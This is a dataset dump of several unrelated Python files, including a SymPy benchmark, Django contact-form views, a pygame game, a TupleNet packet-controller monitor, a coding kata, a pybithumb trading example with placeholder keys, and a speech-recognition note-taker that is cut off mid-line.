Integer(1)/(Integer(2)**n * fact(Integer(n))) * diff((x**2-1)**n, x, n)\n return e.expand()\n\nvar(\"x\")\nfor n in range(10):\n print(n, legendre(n, x))\n\nt1 = clock()\ne = legendre(500, x)\nt2 = clock()\nprint(\"Total time for legendre(500, x):\", t2-t1, \"s\")\n","sub_path":"benchmarks/legendre1.py","file_name":"legendre1.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"515032695","text":"from ansible_server import ansible_server\nfrom multiprocessing import Process, Queue\nfrom Queue import Empty\n\n# DON'T USE THIS UNLESS YOU KNOW WHAT YOU'RE DOING\n# Low level message sending. For high level messaging, use send_msg.\ndef send(msg):\n send_queue.put_nowait(msg)\n\n# Use this one instead of send\ndef send_message(msg_type, content):\n send({\n 'header': {'msg_type': msg_type},\n 'content': content\n })\n\n# Receives a message, or None if there is no current message.\ndef recv():\n try:\n return recv_queue.get_nowait()\n except Empty:\n return None\n\n# Start up the Flask-SocketIO server\nsend_queue = Queue()\nrecv_queue = Queue()\nansible_p = Process(target=ansible_server, args=(send_queue, recv_queue))\nansible_p.start()\n\n","sub_path":"runtime/ansible.py","file_name":"ansible.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"240936506","text":"# coding=utf-8\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.mail import send_mail\nfrom django.shortcuts import render\nfrom django.shortcuts import render, render_to_response\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template.context_processors import csrf\n\nfrom main.models import *\nfrom .models import *\n\n\ndef main(request, args={}):\n args.update(csrf(request))\n try:\n head_title = Head_title.objects.get()\n except Head_title.MultipleObjectsReturned:\n head_title = Head_title.objects.all().last()\n args['head_title'] = head_title\n try:\n head = Head.objects.get()\n except Head.MultipleObjectsReturned:\n head = Head.objects.all().last()\n args['head'] = head\n args['headlink'] = HeadLink.objects.all()\n args['head_phone'] = HeadPhone.objects.all()\n args['inter'] = Inter.objects.all()\n args['menu'] = Menu.objects.all()\n try:\n banner = Banner.objects.get()\n except Banner.MultipleObjectsReturned:\n banner = Banner.objects.all().last()\n args['banner'] = banner\n try:\n question_title = QuestionTitle.objects.get()\n except QuestionTitle.MultipleObjectsReturned:\n question_title = QuestionTitle.objects.all().last()\n args['question_title'] = question_title\n try:\n presentation = Presentation.objects.get()\n except Presentation.MultipleObjectsReturned:\n presentation = Presentation.objects.all().last()\n args['presentation'] = presentation\n try:\n callback_title = CallbackTitle.objects.get()\n except CallbackTitle.MultipleObjectsReturned:\n callback_title = CallbackTitle.objects.all().last()\n args['callback_title'] = callback_title\n try:\n video = Video.objects.get()\n except Video.MultipleObjectsReturned:\n video = Video.objects.all().last()\n args['video'] = video\n try:\n advantages_title = AdvantagesTitle.objects.get()\n except AdvantagesTitle.MultipleObjectsReturned:\n advantages_title = AdvantagesTitle.objects.all().last()\n args['advantages_title'] = advantages_title\n try:\n advantages = Advantages.objects.all()\n except Advantages.DoesNotExist:\n advantages = False\n args['advantages'] = advantages\n try:\n reviews_title = ReviewsTitle.objects.get()\n except ReviewsTitle.MultipleObjectsReturned:\n reviews_title = ReviewsTitle.objects.all().last()\n args['reviews_title'] = reviews_title\n args['reviews'] = Reviews.objects.all()\n try:\n certificate_title = CertificateTitle.objects.get()\n except CertificateTitle.MultipleObjectsReturned:\n certificate_title = CertificateTitle.objects.all().last()\n args['certificate_title'] = certificate_title\n args['links'] = Links.objects.all()\n args['certificates'] = Certificate.objects.all()\n try:\n footer_title = FooterTitle.objects.get()\n except FooterTitle.MultipleObjectsReturned:\n footer_title = FooterTitle.objects.all().last()\n args['footer_title'] = footer_title\n try:\n footer_info = FooterInfo.objects.get()\n except FooterInfo.MultipleObjectsReturned:\n footer_info = FooterInfo.objects.all().last()\n args['footer_info'] = footer_info\n args['footer_text'] = FooterText.objects.all()\n try:\n googlemap = Googlemap.objects.get()\n except Googlemap.MultipleObjectsReturned:\n googlemap = Googlemap.objects.all().last()\n args['googlemap'] = googlemap\n return render_to_response('index.html', args)\n\n\ndef contact(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n phone = request.POST.get('phone')\n email = request.POST.get('email')\n user = Callback(name=name, phone=phone, email=email)\n user.save()\n name = name.encode('utf-8')\n user_id = str(user.id)\n name = 'Моё имя: ' + str(name) + '\\n'\n phone = 'Мой номер: ' + str(phone) + '\\n'\n email = 'Мой email: ' + str(email) + '\\n'\n send_mail('From Ankalife ', name + phone + email + 'Number: ' + user_id, 'donnietruth@gmail.com', ['donnietruth@gmail.com'])\n return HttpResponse(\"Ваша заявка принята!\")\n\n\ndef send_question(request):\n if request.method == 'POST':\n name = request.POST.get('nameQ')\n email = request.POST.get('emailQ')\n question = request.POST.get('question')\n abc = Question(name=name, email=email, question=question)\n abc.save()\n name = name.encode('utf-8')\n question = question.encode('utf-8')\n abc_id = str(abc.id)\n name = 'Моё имя: ' + str(name) + '\\n'\n email = 'Мой email: ' + str(email) + '\\n'\n question = 'Вопрос: ' + str(question) + '\\n'\n send_mail('From Ankalife', name + email + question + 'Number: ' + abc_id, 'donnietruth@gmail.com', ['donnietruth@gmail.com'])\n return HttpResponse('Ваш вопрос принят.')\n\n\ndef call(request):\n if request.method == 'POST':\n name = request.POST.get('name1')\n phone = request.POST.get('phone1')\n email = request.POST.get('email1')\n user = Callback(name=name, phone=phone, email=email)\n user.save()\n name = name.encode('utf-8')\n user_id = str(user.id)\n name = 'Моё имя: ' + str(name) + '\\n'\n phone = 'Мой номер: ' + str(phone) + '\\n'\n email = 'Мой email: ' + str(email) + '\\n'\n send_mail('From Ankalife ', name + phone + email + 'Number: ' + user_id, 'donnietruth@gmail.com', ['donnietruth@gmail.com'])\n return HttpResponse(\"Ваша заявка принята!\")\n\n\n\n\ndef contacts(request, args={}):\n args.update(csrf(request))\n try:\n head_title = Head_title.objects.get()\n except Head_title.MultipleObjectsReturned:\n head_title = Head_title.objects.all().last()\n args['head_title'] = head_title\n try:\n head = Head.objects.get()\n except Head.MultipleObjectsReturned:\n head = Head.objects.all().last()\n args['head'] = head\n args['headlink'] = HeadLink.objects.all()\n args['head_phone'] = HeadPhone.objects.all()\n args['inter'] = Inter.objects.all()\n args['menu'] = Menu.objects.all()\n args['links'] = Links.objects.all()\n try:\n footer_title = FooterTitle.objects.get()\n except FooterTitle.MultipleObjectsReturned:\n footer_title = FooterTitle.objects.all().last()\n args['footer_title'] = footer_title\n try:\n footer_info = FooterInfo.objects.get()\n except FooterInfo.MultipleObjectsReturned:\n footer_info = FooterInfo.objects.all().last()\n args['footer_info'] = footer_info\n args['footer_text'] = FooterText.objects.all()\n try:\n googlemap = Googlemap.objects.get()\n except Googlemap.MultipleObjectsReturned:\n googlemap = Googlemap.objects.all().last()\n args['googlemap'] = googlemap\n return render_to_response('contacts.html', args)","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"123042694","text":"#\n# PYGAME TESTING DEMO - Tea Party Game Testing\n# Author: Wei Zeng\n# Date: Aug.24 2021\n#\n\nfrom main_menu import MainMenu, uiButton\nfrom delivery_zone import *\nfrom collision_container import *\nfrom barrier import *\nfrom barrier_parser import load_txt\nfrom tea_bubble import *\nfrom tea_drop import *\nimport os\nimport pygame\nimport logging\n\n# from pygame.display import toggle_fullscreen\n# from pygame.scrap import contains\n\n# Init Root Directory\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n# Init Font Options\npygame.font.init()\nmyfont = pygame.font.SysFont('Showcard Gothic', 30)\n\n# Macros\nGAME_ON = False\nDAMAGE_RECEIVING_CD = 3000 # milliseconds\nFPS = 60\nWHITE = (255, 255, 255)\nWIDTH, HEIGHT = 1600, 900\nHEALTH_UNIT_WIDTH = 40\nHEALTH_UNIT_HEIGHT = 40\nBACKGROUND_WIDTH = 4000\nBACKGROUND_SPEED = 2\nCONTAINER_WIDTH, CONTAINER_HEIGHT = 180, 180\n\nTEA_CUP_IMAGE = pygame.transform.scale(pygame.image.load(ROOT_DIR + r'/image/teacup.png'),\n (CONTAINER_WIDTH, CONTAINER_HEIGHT))\nTEA_POT_IMAGE = pygame.transform.scale(pygame.image.load(ROOT_DIR + r'/image/teapot.png'),\n (CONTAINER_WIDTH, CONTAINER_HEIGHT))\n\n\nclass Health:\n def __init__(self, image_path):\n self.image = pygame.transform.scale(pygame.image.load(image_path),\n (HEALTH_UNIT_WIDTH, HEALTH_UNIT_HEIGHT)).convert_alpha()\n self.life_count = 3\n self.health_bar_pos_x = 70\n self.health_bar_pos_y = 70\n\n\ndef draw(window, map, obj_list, tea_drops, health, collected_tea, tea_bubbles, main_menu):\n \"\"\"\n draw(window, obj_list, tea_drops):\n :param tea_bubbles:\n :param health:\n :param collected_tea:\n :param map:\n :param tea_drops: Qualified tea drops list to be drawn\n :param obj_list: Container list basically, containers to be drawn\n :param window: The main game window object\n :return: Void, draw all passed in objects\n \"\"\"\n\n global GAME_ON\n # Setup White Background\n window.fill(WHITE)\n\n # Draw Background\n window.blit(map.image, (map.starting_dx, 0))\n\n # Draw barriers\n for barrier in map.barriers:\n window.blit(barrier.image,\n (barrier.get_global_position(map.starting_dx), 0))\n # Draw delivery zones\n for zone in map.delivery_zones:\n window.blit(zone.image,\n (zone.get_global_position(map.starting_dx), 0))\n\n window.blit(zone.image,\n (zone.get_mirror_global_position(map.starting_dx), 0))\n\n deliver_here_image = pygame.image.load(ROOT_DIR + r'/image/deliver_here.png')\n # Draw delivery zones\n for zone in map.delivery_zones:\n window.blit(zone.image,\n (zone.get_global_position(map.starting_dx), 0))\n\n window.blit(zone.image,\n (zone.get_mirror_global_position(map.starting_dx), 0))\n\n window.blit(deliver_here_image,\n (zone.get_global_position(map.starting_dx), 0))\n\n window.blit(deliver_here_image,\n (zone.get_mirror_global_position(map.starting_dx), 0))\n\n text_surface = myfont.render(\n str(zone.tea_level) + ' / ' + str(zone.tea_requirement), False, (0, 0, 0))\n window.blit(text_surface, (zone.get_global_position(map.starting_dx) - 100, 35))\n window.blit(text_surface, (zone.get_mirror_global_position(map.starting_dx) - 100, 35))\n\n if GAME_ON:\n obj_index = 0\n for i in obj_list:\n window.blit(i.image, (i.position_rect.x, i.position_rect.y))\n if obj_index == 0:\n tea_pot_surface = myfont.render(str(i.tea_level), False, (0, 0, 0))\n window.blit(tea_pot_surface, (i.position_rect.x + 55, i.position_rect.y + 55))\n obj_index += 1\n\n # Display End Game Content or Main Menu\n if map.are_delivery_zones_full():\n window.blit(pygame.image.load(\n ROOT_DIR + r'/image/you_win.png'), (WIDTH / 3, HEIGHT / 3))\n elif health.life_count <= 0:\n window.blit(pygame.image.load(\n ROOT_DIR + r'/image/game_over.png'), (WIDTH / 4, HEIGHT / 6))\n elif not GAME_ON:\n main_menu.show_main_menu(window)\n\n # Draw tea drops\n for d in tea_drops:\n window.blit(d.image, (d.position_rect.x, d.position_rect.y))\n\n # Draw Healthbar\n if GAME_ON:\n i = 0\n while i < health.life_count:\n window.blit(health.image, (health.health_bar_pos_x +\n i * 60, health.health_bar_pos_y))\n i += 1\n\n # Draw Tea Bubbles\n draw_all_tea_bubble(window, tea_bubbles)\n\n # Init Collected Tea Display Text and Draw\n textsurface = myfont.render(\n 'Tea Drops: ' + str(collected_tea), False, (0, 0, 0))\n window.blit(textsurface, (1200, 70))\n window.blit(pygame.image.load(\n ROOT_DIR + r'/image/teadrop.png'), (1410, 70))\n\n pygame.display.update()\n\n\ndef is_game_on(life_count, map):\n \"\"\"\n is_game_on(life_count, map):\n :param life_count:\n :param map:\n :return:\n \"\"\"\n global GAME_ON\n if life_count > 0 and not map.are_delivery_zones_full() and GAME_ON:\n return True\n else:\n return False\n\n\ndef main():\n \"\"\"\n main(): This is the game main execution function, including the main execution loop and\n game logic.\n :return: Void\n \"\"\"\n\n # Initialize the game window\n window = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Tea-Mates\")\n\n # Fetch Barrier and Delivery Zone data\n data = load_txt(os.path.join(ROOT_DIR, 'barrier_data.txt'))\n barriers_data = data[0]\n delivery_zone_data = data[1]\n\n barriers = []\n delivery_zones = []\n\n for bNode in barriers_data:\n barriers.append(Barrier(bNode))\n\n for bNode in delivery_zone_data:\n delivery_zones.append(DeliveryZone(bNode))\n\n # Start game clock\n clock = pygame.time.Clock()\n start_time = pygame.time.get_ticks()\n last_tea_drop_time = start_time\n damage_timer = None\n run = True\n\n # Initialize Health Bar\n health = Health(ROOT_DIR + r'/image/teacup.png')\n\n # Initialize game objects\n game_map = Map(ROOT_DIR + r'/image/Background.png',\n barriers, delivery_zones)\n cup = Container(0, 600, ROOT_DIR + r'/image/teacup.png', 0, 101, 87)\n pot = Container(0, 100, ROOT_DIR + r'/image/teapot.png', 20, 143, 106)\n\n collected_tea = 0\n tea_bub_image_path = os.path.join(ROOT_DIR, 'image/tea_bubble')\n\n qualified_drops = []\n last_bubble_gen_time = [start_time]\n all_bubble_list = []\n \n # Create Main Menu Components\n game_over_timer = 0\n def start_game(game_map: Map , healt_count):\n global GAME_ON\n\n if healt_count == 3:\n if not GAME_ON:\n GAME_ON = True\n game_map.starting_dx = 0\n\n main_menu = MainMenu([]) \n start_button = uiButton(start_game, 'Start', main_menu.pos_x + WIDTH / 5.5, 400)\n main_menu.buttons.append(start_button)\n\n # Main Execution Loop\n while run:\n global GAME_ON\n clock.tick(FPS)\n now = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.MOUSEBUTTONUP:\n mouse_click_pos = pygame.mouse.get_pos()\n print(mouse_click_pos)\n if start_button.collision_rect.collidepoint(mouse_click_pos):\n start_game(game_map, health.life_count)\n\n now = pygame.time.get_ticks()\n\n if is_game_on(health.life_count, game_map):\n pot.tea_drop_position_update()\n # Randomly Generate Tea Bubbles Every 5 Seconds\n new_bubble = gen_rand_tea_bubble_per_n_second(5, last_bubble_gen_time, tea_bub_image_path)\n if new_bubble is not None:\n all_bubble_list.append(new_bubble)\n\n for zone in delivery_zones:\n zone.detect_collision(cup, game_map)\n zone.detect_mirror_collision(cup, game_map)\n\n # Drop a unit of tea every 0.4 seconds\n if now - last_tea_drop_time > 400 and pot.tea_level > 0:\n qualified_drops.append(\n TeaDrop(pot.tea_drop_position[0], pot.tea_drop_position[1], ROOT_DIR + r'/image/teadrop.png'))\n pot.tea_level -= 1\n last_tea_drop_time = now\n\n collected_tea = cup.tea_level\n\n # Check Collision To Determine Whether to Draw\n qualified_drops = drop_tea(qualified_drops, cup)\n all_bubble_list = get_qualified_tea_bubble(all_bubble_list, pot)\n\n keys_pressed = pygame.key.get_pressed()\n pot_control_listener(keys_pressed, pot)\n cup_control_listener(keys_pressed, cup)\n\n # for bub in all_bubble_list:\n # if tea_bubble_collision_detector(pot, bub):\n # refill_tea(pot, bub)\n\n # Using the new can_receive_damage bosol of containers to give some breathing room after taking a damage\n # DAMAGE_RECEIVING_CD is set to 3000 milliseconds (3 seconds) Damage timer starts immediately after a\n # collision happens and counts to 3 and then can_receive_damage is set back to True\n if cup.can_receive_damage and pot.can_receive_damage:\n draw(window, game_map, [pot, cup], qualified_drops, health, collected_tea, all_bubble_list, main_menu)\n if collision_detector(pot, cup):\n damage_timer = now\n health.life_count = 0\n game_over_timer = now\n GAME_ON = False\n for barrier in barriers:\n if barrier.detect_collision(pot, game_map) or barrier.detect_collision(cup, game_map):\n damage_timer = now\n health.life_count -= 1\n if not health.life_count > 0:\n game_over_timer = now\n GAME_ON = False\n else:\n time_passed = now - damage_timer\n if time_passed < 500 or (1000 < time_passed < 1500) or (2000 < time_passed < 2500):\n draw(window, game_map, [], qualified_drops,\n health, collected_tea, all_bubble_list, main_menu)\n else:\n draw(window, game_map, [\n pot, cup], qualified_drops, health, collected_tea, all_bubble_list, main_menu)\n # Reset the damage timer 3 seconds after getting damaged\n if now - damage_timer > DAMAGE_RECEIVING_CD:\n pot.can_receive_damage = True\n cup.can_receive_damage = True\n damage_timer = None\n # Update TeaDrop Position\n if game_map.are_delivery_zones_full():\n game_over_timer = now\n GAME_ON = False\n else:\n draw(window, game_map, [], [], health,\n collected_tea, all_bubble_list, main_menu)\n game_map.slideMap()\n if ((not GAME_ON and health.life_count <= 0) or game_map.are_delivery_zones_full()) and now - game_over_timer > 4000:\n main()\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"201242079","text":"\"\"\"\nYou roll N fair six­sided dice.\nThe sum of the values is M.\nWe wish to know about the product of the faces.\n\nQuestions:\nIf N = 8 and M = 24, what is the expected value and standard deviation\n of the product?\n\nIf N = 50 and M = 150, what is the expected value and standard deviation\n of the product?\n\"\"\"\n\nimport numpy as np\n\n\ndef productOfAllFacesMonteCarlo(n, m, s):\n # @input:\n # int n, nummbers of rolling dice\n # int m, sum of values\n # int s, sample size\n # @output:\n # mean, expected value of the product\n # std, standard deviation of the product\n product = []\n for i in range(s):\n dice = np.random.randint(1, 7, size=(1, n))\n if dice.sum() == m:\n product.append(float(np.prod(dice)))\n return (float(np.mean(product)), np.std(product))\n\n\nif __name__ == '__main__':\n print(productOfAllFacesMonteCarlo(2, 6, 1000))\n","sub_path":"roll_fair_dice.py","file_name":"roll_fair_dice.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"589884025","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('funcionarios', '0003_ponto'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='ponto',\n name='funcionario',\n field=models.ForeignKey(to='funcionarios.Funcionario', related_name='dia_trabalho'),\n ),\n ]\n","sub_path":"funcionarios/migrations/0004_auto_20160217_1944.py","file_name":"0004_auto_20160217_1944.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"254757336","text":"import threading\nimport os, sys\nimport time\nimport logging\nimport subprocess\nimport struct, socket\nimport flow_common\nimport run_env\nfrom pyDatalog import pyDatalog\nfrom commit_ovs import commit_flows\nfrom onexit import on_parent_exit\nfrom tp_utils import pipe\nfrom run_env import get_extra\nfrom tuplesync import update_ovs_side\nfrom logicalview import LOGICAL_ENTITY_TYPE_LSP, LOGICAL_ENTITY_TYPE_CHASSIS\n\nMAX_BUF_LEN = 10240\n\nextra = run_env.get_extra()\nlogger = logging.getLogger(__name__)\nentity_zoo = None\n\ndef int_to_ip(ip_int):\n return socket.inet_ntoa(struct.pack('I',socket.htonl(ip_int)))\n\ndef update_ovs_arp_ip_mac(mac_addr, ip_int):\n match = 'table={t},priority=1,ip,reg2={dst},'.format(\n t = flow_common.TABLE_SEARCH_IP_MAC, dst = ip_int)\n action = 'actions=mod_dl_dst:{}'.format(mac_addr)\n flow = match + action\n commit_flows([flow], [])\n\ndef process_arp(arp_msg_seg):\n #TODO verify mac_addr, ip\n datapath = int(arp_msg_seg[1])\n mac_addr = arp_msg_seg[2]\n ip_int = int(arp_msg_seg[3])\n ip = int_to_ip(ip_int)\n logger.info(\"update arp mac_ip bind map[%s,%d(%s),%d]\",\n mac_addr, ip_int, ip, datapath)\n update_ovs_arp_ip_mac(mac_addr, ip_int)\n\ndef process_trace(trace_msg_seg):\n table_id = trace_msg_seg[1]\n datapath_id = trace_msg_seg[2]\n cmd_id = int(trace_msg_seg[3]) >> 16\n src_port_id = trace_msg_seg[4]\n dst_port_id = trace_msg_seg[5]\n tun_src = int(trace_msg_seg[6])\n seq_n = trace_msg_seg[7]\n logger.info('tracing packets, table_id:%s, datapath_id:%s, '\n 'cmd_id:%d, src_port_id:%s, dst_port_id:%s, seq:%s, tun_src:%d',\n table_id, datapath_id, cmd_id,\n src_port_id, dst_port_id, seq_n, tun_src)\n ttl = 30\n chassis_id = get_extra()['system_id']\n key = \"cmd_result/{}/{}/{}\".format(cmd_id, seq_n, chassis_id)\n value = \"cmd_type=pkt_trace,table_id={},datapath_id={},src_port_id={},dst_port_id={},tun_src={}\".format(\n table_id, datapath_id, src_port_id, dst_port_id, tun_src)\n wmaster = extra['lm']\n wmaster.lease_communicate(key, value, ttl)\n\ndef process_unknow_dst(unknow_dst_msg_seg):\n datapath_id = int(unknow_dst_msg_seg[1])\n ip_int = int(unknow_dst_msg_seg[2])\n ip = int_to_ip(ip_int)\n logger.info(\"receive unknow packet: datapath:%d,dst_ip:%s\", datapath_id, ip)\n table_id = int(unknow_dst_msg_seg[1])\n\n # find all lsp by using ip\n # TODO figure out all or just one?\n def fn_lsp(lsp_portset, ip_int):\n array = []\n for _, lsp in lsp_portset.items():\n if lsp.ip_int == ip_int:\n array.append(lsp)\n return array\n\n def fn_chassis(chassis_set, chassis_uuid):\n array = []\n for _, chassis in chassis_set.items():\n if chassis.uuid == chassis_uuid:\n array.append(chassis)\n return array\n\n lsp_array = entity_zoo.touch_entity(LOGICAL_ENTITY_TYPE_LSP, fn_lsp, ip_int)\n if len(lsp_array) == 0:\n return\n\n cnt = 0\n for lsp in lsp_array:\n if lsp.chassis is None:\n continue\n chassis_array = entity_zoo.touch_entity(LOGICAL_ENTITY_TYPE_CHASSIS,\n fn_chassis, lsp.chassis)\n cnt += len(chassis_array)\n\n if cnt != 0:\n update_ovs_side(entity_zoo)\n\n\ndef parse_pkt_controller_msg(msg):\n msg_array = msg.split(';')\n for cmd in msg_array:\n if cmd == '':\n continue\n try:\n segment = cmd.split(',')\n opcode = segment[0]\n if opcode == 'arp':\n process_arp(segment)\n elif opcode == 'trace':\n process_trace(segment)\n elif opcode == 'unknow_dst':\n process_unknow_dst(segment)\n else:\n logger.warning('unknow msg from pkt_controller,msg:%s', msg)\n except Exception as err:\n logger.exception('error in parsing pkt_controller msg, err:%s', err)\n continue\n\ndef run_pkt_controller_instance():\n env = os.environ.copy()\n if extra.has_key('log_dir'):\n env['TUPLENET_LOGDIR'] = extra['log_dir']\n parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n cmd = ['{}/pkt_controller/pkt_controller'.format(parent_dir)]\n try:\n child = subprocess.Popen(cmd, stdout=subprocess.PIPE, env = env,\n preexec_fn=on_parent_exit('SIGTERM'))\n logger.info(\"the pkt_controller is running now\")\n except Exception as err:\n logger.warning(\"cannot open %s, err:%s\", cmd, err)\n\n\ndef monitor_pkt_controller_tunnel(ez, extra):\n # make global entity_zoo can be accessed\n global entity_zoo\n entity_zoo = ez\n try:\n pyDatalog.Logic(extra['logic'])\n run_pkt_controller_instance()\n fd = pipe.create_pkt_controller_tunnel()\n while True:\n msg = os.read(fd, MAX_BUF_LEN)\n if msg == '':\n logger.info('receive no msg, maybe pkt_controller is down')\n return\n parse_pkt_controller_msg(msg)\n except Exception as err:\n logger.warning(\"hit unknow error, exit monitoring pkt_controller:%s\", err)\n\n\ndef start_monitor_pkt_controller_tunnel(entity_zoo, extra):\n t = threading.Thread(target = monitor_pkt_controller_tunnel,\n args=(entity_zoo, extra))\n t.setDaemon(True)\n t.start()\n return t\n\n","sub_path":"src/tuplenet/lcp/state_update.py","file_name":"state_update.py","file_ext":"py","file_size_in_byte":5464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"514949884","text":"'''\nAt a job interview, you are challenged to write an algorithm to check if a given string, s, can be formed from two other strings, part1 and part2.\n\nThe restriction is that the characters in part1 and part2 should be in the same order as in s.\n\nThe interviewer gives you the following example and tells you to figure out the rest from the given test cases.\n'''\n\ndata = 'codewars', 'code', 'wars'\nwrong_data = 'codewars', 'cod', 'wars'\ndata1 = \"Can we merge it? Yes, we can!\", \"an wmreY a!\", \"Ce eg it? es, wecn\"\n\n\ndef is_merge(s, part1, part2):\n if len(s) != len(part1) + len(part2):\n return False\n count = 0\n temp = ''\n for i in s:\n try:\n if (part1 and part2) and (part1[len(temp)] == i and part2[len(temp)] == i):\n temp += i\n elif i in part1 or i in part2:\n if part1 and i == part1[len(temp)]:\n if temp:\n part1 = part1[len(temp):]\n temp = ''\n part1 = part1.replace(i, '', 1)\n count += 1\n elif part2 and i == part2[len(temp)]:\n if temp:\n part2 = part2[len(temp):]\n temp = ''\n part2 = part2.replace(i, '', 1)\n count += 1\n except Exception:\n return False\n\n print(part1, part2)\n return not any((part1, part2))\n\nprint(is_merge('codewars', 'code', 'code'))\n","sub_path":"merged_string.py","file_name":"merged_string.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"236571919","text":"import pybithumb\n\ncon_key = \"81dd5f25e5daa70b2fff603901d2c09c\"\nsec_key = \"82333efegeg9eg3e77c573weg34af17a\"\n\nbithumb = pybithumb.Bithumb(con_key, sec_key)\n\nunit = bithumb.get_balance(\"BTC\")[0]\nprint(unit)\norder = bithumb.sell_limit_order(\"BTC\", 4000000, unit)\nprint(order)\n","sub_path":"ch06/06_09.py","file_name":"06_09.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"640559578","text":"#!/usr/bin/python3\n# NOTE: May require the system Python 3 rather than using 3.9\nimport os.path\nimport sys\nimport json\nimport socket\nimport functools\nimport threading\nimport traceback\nimport subprocess\nimport time\nimport requests\nimport speech_recognition as sr\n\nTRIGGER_SOCKET = \"/tmp/stenographer\"\nNOTES_DIR = os.path.expanduser(os.environ.get(\"NOTES_DIR\", \"~/tmp/notes\"))\nos.makedirs(NOTES_DIR, exist_ok=True)\n\n# Get rid of the ALSA warnings by preloading it with stderr muted\ndef silence_pyaudio():\n\tdevnull = os.open(os.devnull, os.O_WRONLY)\n\told_stderr = os.dup(2)\n\tsys.stderr.flush()\n\tos.dup2(devnull, 2)\n\tos.close(devnull)\n\ttry:\n\t\timport pyaudio; pyaudio.PyAudio()\n\tfinally:\n\t\tos.dup2(old_stderr, 2)\n\t\tos.close(old_stderr)\n\ndef log_errors(f):\n\t@functools.wraps(f)\n\tdef inner(*a, **kw):\n\t\ttry:\n\t\t\tf(*a, **kw)\n\t\texcept:\n\t\t\twith open(NOTES_DIR + \"/notes.err\", \"a\") as err:\n\t\t\t\ttraceback.print_exc(file=err)\n\t\t\traise\n\treturn inner\n\ndef safe_int(n):\n\t\"\"\"Sort key for probably-numeric strings\n\n\tSorts unparseable strings first in lexicographical order, then\n\teverything that intifies in numerical order.\n\t\"\"\"\n\ttry: return (1, int(n))\n\texcept (ValueError, TypeError): return (0, n)\n\nrecog = None\n@log_errors\ndef take_notes(*, desc, new_match=False, **extra):\n\tblocks = sorted(os.listdir(NOTES_DIR), key=safe_int)\n\n\ttry: int(blocks[-1])\n\texcept (IndexError, ValueError): new_match = 2\n\tif new_match:\n\t\tnext = int(blocks[-1] if new_match != 2 else 0) + 1\n\t\tblocks.append(str(next))\n\t\tos.mkdir(NOTES_DIR + \"/\" + blocks[-1])\n\tblock = NOTES_DIR + \"/\" + blocks[-1] # Use the latest block (which we may have just created)\n\n\tglobal recog\n\tif recog is None:\n\t\tsilence_pyaudio()\n\t\trecog = sr.Recognizer()\n\t\trecog.dynamic_energy_threshold = False\n\t\trecog.energy_threshold = 50 # My microphone is very good. It doesn't pick up much background.\n\t\tif os.stat(NOTES_DIR + \"/listening.wav\"):\n\t\t\t# Provide a notification tone. This one works well and is licensed CC0:\n\t\t\t# https://freesound.org/people/YourFriendJesse/sounds/235911/\n\t\t\tsubprocess.run([\"paplay\", NOTES_DIR + \"/listening.wav\", \"--volume=24576\"])\n\n\t# Can I increase the gain at all?\n\twith sr.Microphone() as source:\n\t\tprint(\"Listening for notes...\")\n\t\taudio = recog.listen(source, phrase_time_limit=15.0)\n\n\t# Discard crazily-long entries. They seem to happen if the recognizer doesn't\n\t# get a proper silence to start with or something, and it just records forever.\n\t# (Shouldn't happen since the time limit is 15s, but it's an easy safety net.)\n\tif len(audio.frame_data) / audio.sample_width / audio.sample_rate > 60.0:\n\t\t# More than sixty seconds? Throw it away.\n\t\tsys.exit(0)\n\n\tprint(\"Got notes.\")\n\tlog = open(NOTES_DIR + \"/notes.log\", \"a\")\n\ttry: os.stat(block + \"/metadata.json\")\n\texcept FileNotFoundError:\n\t\t# If the metadata file doesn't exist, it's a new block. Note that this\n\t\t# won't always correspond to the new_block marker, eg if the recording\n\t\t# goes too long or is just broken.\n\t\tprint(\"-\" * 65, file=log)\n\t\tprint(\"http://localhost:27013/static/notes.html#\" + blocks[-1], file=log)\n\t\timport webbrowser; webbrowser.open(\"http://localhost:27013/static/notes.html#\" + blocks[-1])\n\n\tprint(\"[%s]\" % block, desc, file=log, flush=True)\n\n\td = None\n\ttry: d = recog.recognize_sphinx(audio, show_all=True)\n\texcept sr.UnknownValueError: pass\n\texcept sr.RequestError as e: print(\"Sphinx:\", e, file=log, flush=True)\n\n\toptions = [b.hypstr for b in d.nbest()] if d else []\n\tseen = {}\n\tfor txt in options[:5]:\n\t\tprint(\"Sphinx: %s\" % txt, file=log, flush=True)\n\t\tseen[txt] = 1\n\n\t# Maybe TODO: Set an API key with key=\"....\"\n\ttry: google = recog.recognize_google(audio)\n\texcept sr.UnknownValueError: google = \"\"\n\texcept sr.RequestError 